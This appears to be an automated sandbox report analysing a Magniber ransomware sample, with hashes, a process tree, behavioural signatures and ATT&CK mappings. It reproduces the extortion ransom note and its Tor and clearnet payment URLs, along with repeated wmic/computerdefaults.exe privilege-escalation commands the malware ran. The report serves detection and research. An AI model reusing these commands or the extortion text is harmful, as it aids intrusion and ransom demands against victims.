Analysis

  • max time kernel
    136s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    18-10-2021 19:38

General

  • Target

    1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

  • Size

    22KB

  • MD5

    7906dc475a8ae55ffb5af7fd3ac8f10a

  • SHA1

    e7304e2436dc0eddddba229f1ec7145055030151

  • SHA256

    1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

  • SHA512

    c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://ce7c208812783e608eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://ce7c208812783e608eltalkfzj.jobsbig.cam/eltalkfzj http://ce7c208812783e608eltalkfzj.boxgas.icu/eltalkfzj http://ce7c208812783e608eltalkfzj.sixsees.club/eltalkfzj http://ce7c208812783e608eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://ce7c208812783e608eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://ce7c208812783e608eltalkfzj.jobsbig.cam/eltalkfzj

http://ce7c208812783e608eltalkfzj.boxgas.icu/eltalkfzj

http://ce7c208812783e608eltalkfzj.sixsees.club/eltalkfzj

http://ce7c208812783e608eltalkfzj.nowuser.casa/eltalkfzj

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 14 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Program crash 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2320
    • \??\c:\windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1272
    • \??\c:\windows\system32\cmd.exe
      cmd /c "start http://ce7c208812783e608eltalkfzj.jobsbig.cam/eltalkfzj^&1^&43051757^&80^&333^&2215063"
      2⤵
      • Checks computer location settings
      PID:3516
    • \??\c:\windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4024
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:944
    • \??\c:\windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1068
  • c:\windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2732
    • \??\c:\windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
        3⤵
          PID:3924
      • \??\c:\windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
          3⤵
            PID:3684
      • C:\Windows\system32\DllHost.exe
        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
        1⤵
          PID:3644
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 3644 -s 812
            2⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1488
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3456
          • C:\Windows\System32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3876
            • C:\Windows\system32\wbem\WMIC.exe
              C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
              3⤵
                PID:2564
            • C:\Windows\System32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3224
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                3⤵
                  PID:1368
            • C:\Windows\Explorer.EXE
              C:\Windows\Explorer.EXE
              1⤵
              • Modifies registry class
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of UnmapMainImage
              • Suspicious use of WriteProcessMemory
              PID:3008
              • C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
                "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:1556
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3024
                  • C:\Windows\system32\wbem\WMIC.exe
                    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                    4⤵
                      PID:1916
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1900
                    • C:\Windows\system32\wbem\WMIC.exe
                      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                      4⤵
                        PID:2436
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3796
                      • C:\Windows\system32\wbem\WMIC.exe
                        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                        4⤵
                          PID:1324
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:984
                        • C:\Windows\system32\wbem\WMIC.exe
                          C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                          4⤵
                            PID:4144
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1168
                        • C:\Windows\system32\wbem\WMIC.exe
                          C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                          3⤵
                            PID:3148
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4016
                          • C:\Windows\system32\wbem\WMIC.exe
                            C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                            3⤵
                              PID:1804
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                          1⤵
                          • Modifies registry class
                          • Suspicious use of WriteProcessMemory
                          PID:2332
                          • \??\c:\windows\system32\cmd.exe
                            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2828
                            • C:\Windows\system32\wbem\WMIC.exe
                              C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                              3⤵
                                PID:3040
                            • \??\c:\windows\system32\cmd.exe
                              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1400
                              • C:\Windows\system32\wbem\WMIC.exe
                                C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
                                3⤵
                                  PID:2140
                            • C:\Windows\system32\cmd.exe
                              cmd /c computerdefaults.exe
                              1⤵
                              • Process spawned unexpected child process
                              • Suspicious use of WriteProcessMemory
                              PID:4228
                              • C:\Windows\system32\ComputerDefaults.exe
                                computerdefaults.exe
                                2⤵
                                  PID:4452
                              • C:\Windows\system32\cmd.exe
                                cmd /c computerdefaults.exe
                                1⤵
                                • Process spawned unexpected child process
                                • Suspicious use of WriteProcessMemory
                                PID:4220
                                • C:\Windows\system32\ComputerDefaults.exe
                                  computerdefaults.exe
                                  2⤵
                                    PID:4472
                                • C:\Windows\system32\cmd.exe
                                  cmd /c computerdefaults.exe
                                  1⤵
                                  • Process spawned unexpected child process
                                  PID:4296
                                  • C:\Windows\system32\ComputerDefaults.exe
                                    computerdefaults.exe
                                    2⤵
                                      PID:4608
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c computerdefaults.exe
                                    1⤵
                                    • Process spawned unexpected child process
                                    PID:4324
                                    • C:\Windows\system32\ComputerDefaults.exe
                                      computerdefaults.exe
                                      2⤵
                                        PID:4620
                                    • C:\Windows\system32\cmd.exe
                                      cmd /c computerdefaults.exe
                                      1⤵
                                      • Process spawned unexpected child process
                                      PID:4368
                                      • C:\Windows\system32\ComputerDefaults.exe
                                        computerdefaults.exe
                                        2⤵
                                          PID:4528
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c computerdefaults.exe
                                        1⤵
                                        • Process spawned unexpected child process
                                        PID:4460
                                        • C:\Windows\system32\ComputerDefaults.exe
                                          computerdefaults.exe
                                          2⤵
                                            PID:4900
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c computerdefaults.exe
                                          1⤵
                                          • Process spawned unexpected child process
                                          PID:4520
                                          • C:\Windows\system32\ComputerDefaults.exe
                                            computerdefaults.exe
                                            2⤵
                                              PID:4756
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c computerdefaults.exe
                                            1⤵
                                            • Process spawned unexpected child process
                                            PID:4672
                                            • C:\Windows\system32\ComputerDefaults.exe
                                              computerdefaults.exe
                                              2⤵
                                                PID:5072
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c computerdefaults.exe
                                              1⤵
                                              • Process spawned unexpected child process
                                              PID:4708
                                              • C:\Windows\system32\ComputerDefaults.exe
                                                computerdefaults.exe
                                                2⤵
                                                  PID:4396
                                              • C:\Windows\system32\cmd.exe
                                                cmd /c computerdefaults.exe
                                                1⤵
                                                • Process spawned unexpected child process
                                                PID:4732
                                                • C:\Windows\system32\ComputerDefaults.exe
                                                  computerdefaults.exe
                                                  2⤵
                                                    PID:4480
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c computerdefaults.exe
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  PID:4804
                                                  • C:\Windows\system32\ComputerDefaults.exe
                                                    computerdefaults.exe
                                                    2⤵
                                                      PID:3788
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c computerdefaults.exe
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    PID:4816
                                                    • C:\Windows\system32\ComputerDefaults.exe
                                                      computerdefaults.exe
                                                      2⤵
                                                        PID:420
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c computerdefaults.exe
                                                      1⤵
                                                      • Process spawned unexpected child process
                                                      PID:5008
                                                      • C:\Windows\system32\ComputerDefaults.exe
                                                        computerdefaults.exe
                                                        2⤵
                                                          PID:376
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /c computerdefaults.exe
                                                        1⤵
                                                        • Process spawned unexpected child process
                                                        PID:5036
                                                        • C:\Windows\system32\ComputerDefaults.exe
                                                          computerdefaults.exe
                                                          2⤵
                                                            PID:2064
                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                          1⤵
                                                          • Drops file in Windows directory
                                                          • Modifies Internet Explorer settings
                                                          • Modifies registry class
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1628
                                                        • C:\Windows\system32\browser_broker.exe
                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                          1⤵
                                                          • Modifies Internet Explorer settings
                                                          PID:800
                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                          1⤵
                                                          • Suspicious behavior: MapViewOfSection
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2364
                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                          1⤵
                                                          • Drops file in Windows directory
                                                          • Modifies Internet Explorer settings
                                                          • Modifies registry class
                                                          PID:3168
                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                          1⤵
                                                          • Modifies registry class
                                                          PID:4996
                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                          1⤵
                                                          • Drops file in Windows directory
                                                          • Modifies registry class
                                                          PID:5116

                                                        Network

                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                        Defense Evasion

                                                        Modify Registry

                                                        1
                                                        T1112

                                                        Discovery

                                                        Query Registry

                                                        1
                                                        T1012

                                                        System Information Discovery

                                                        1
                                                        T1082

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\Windows\3720402701\2274612954.pri
                                                          MD5

                                                          0db264b38ac3c5f6c140ba120a7fe72f

                                                          SHA1

                                                          51aa2330c597e84ed3b0d64bf6b73bf6b15f9d74

                                                          SHA256

                                                          2f6955b0f5277a7904c59e461bfa6b06c54fece0d7c11f27408fa7a281a4556d

                                                          SHA512

                                                          3534c243516cef5cee0540d5efd5cde1f378e127e6013b5e309a2e0be8393417bfe458706564b4b955f92132a51e2772c67f9fd90441476cc3512a5d9f910d84

                                                        • C:\Users\Public\readme.txt
                                                          MD5

                                                          1fd6bb31cd6a18d53ddd72d1c26a8912

                                                          SHA1

                                                          b419c7cbc78eeb4ce80b5c7c12438ab2f70c572b

                                                          SHA256

                                                          f756af6e362ef4f39efaa2ff005631c4d8b88b0ab38daabc978bac37d33416dd

                                                          SHA512

                                                          17322a3cf202485f281d2e8738ad93ffd219483e9fb7a8f923e5d4786b00dbd1ab8579fa6d7356d0e89d2a08b4ab8ca15da5aebaa144ded2b8d6b533aafbdcef

                                                        • memory/376-172-0x0000000000000000-mapping.dmp
                                                        • memory/420-171-0x0000000000000000-mapping.dmp
                                                        • memory/944-138-0x0000000000000000-mapping.dmp
                                                        • memory/984-152-0x0000000000000000-mapping.dmp
                                                        • memory/1068-135-0x0000000000000000-mapping.dmp
                                                        • memory/1168-136-0x0000000000000000-mapping.dmp
                                                        • memory/1272-128-0x0000000000000000-mapping.dmp
                                                        • memory/1324-158-0x0000000000000000-mapping.dmp
                                                        • memory/1368-154-0x0000000000000000-mapping.dmp
                                                        • memory/1400-134-0x0000000000000000-mapping.dmp
                                                        • memory/1556-126-0x00000216F7330000-0x00000216F7331000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-121-0x00000216F72C0000-0x00000216F72C1000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-125-0x00000216F7320000-0x00000216F7321000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-115-0x00000216F5250000-0x00000216F5256000-memory.dmp
                                                          Filesize

                                                          24KB

                                                        • memory/1556-157-0x00000216F7960000-0x00000216F7961000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-116-0x00000216F52D0000-0x00000216F52D1000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-123-0x00000216F7300000-0x00000216F7301000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-118-0x00000216F52F0000-0x00000216F52F1000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-124-0x00000216F7310000-0x00000216F7311000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-122-0x00000216F72D0000-0x00000216F72D1000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-119-0x00000216F5300000-0x00000216F5301000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-117-0x00000216F52E0000-0x00000216F52E1000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1556-120-0x00000216F72B0000-0x00000216F72B1000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1804-145-0x0000000000000000-mapping.dmp
                                                        • memory/1816-139-0x0000000000000000-mapping.dmp
                                                        • memory/1900-147-0x0000000000000000-mapping.dmp
                                                        • memory/1916-155-0x0000000000000000-mapping.dmp
                                                        • memory/2064-173-0x0000000000000000-mapping.dmp
                                                        • memory/2140-144-0x0000000000000000-mapping.dmp
                                                        • memory/2320-127-0x000001CD2AE90000-0x000001CD2AE94000-memory.dmp
                                                          Filesize

                                                          16KB

                                                        • memory/2436-156-0x0000000000000000-mapping.dmp
                                                        • memory/2564-153-0x0000000000000000-mapping.dmp
                                                        • memory/2740-140-0x0000000000000000-mapping.dmp
                                                        • memory/2828-133-0x0000000000000000-mapping.dmp
                                                        • memory/3024-146-0x0000000000000000-mapping.dmp
                                                        • memory/3040-141-0x0000000000000000-mapping.dmp
                                                        • memory/3148-148-0x0000000000000000-mapping.dmp
                                                        • memory/3224-143-0x0000000000000000-mapping.dmp
                                                        • memory/3516-130-0x0000000000000000-mapping.dmp
                                                        • memory/3684-149-0x0000000000000000-mapping.dmp
                                                        • memory/3788-168-0x0000000000000000-mapping.dmp
                                                        • memory/3796-150-0x0000000000000000-mapping.dmp
                                                        • memory/3840-132-0x0000000000000000-mapping.dmp
                                                        • memory/3876-142-0x0000000000000000-mapping.dmp
                                                        • memory/3924-151-0x0000000000000000-mapping.dmp
                                                        • memory/4016-137-0x0000000000000000-mapping.dmp
                                                        • memory/4024-131-0x0000000000000000-mapping.dmp
                                                        • memory/4144-159-0x0000000000000000-mapping.dmp
                                                        • memory/4396-169-0x0000000000000000-mapping.dmp
                                                        • memory/4452-160-0x0000000000000000-mapping.dmp
                                                        • memory/4472-161-0x0000000000000000-mapping.dmp
                                                        • memory/4480-170-0x0000000000000000-mapping.dmp
                                                        • memory/4528-162-0x0000000000000000-mapping.dmp
                                                        • memory/4608-163-0x0000000000000000-mapping.dmp
                                                        • memory/4620-164-0x0000000000000000-mapping.dmp
                                                        • memory/4756-165-0x0000000000000000-mapping.dmp
                                                        • memory/4900-166-0x0000000000000000-mapping.dmp
                                                        • memory/5072-167-0x0000000000000000-mapping.dmp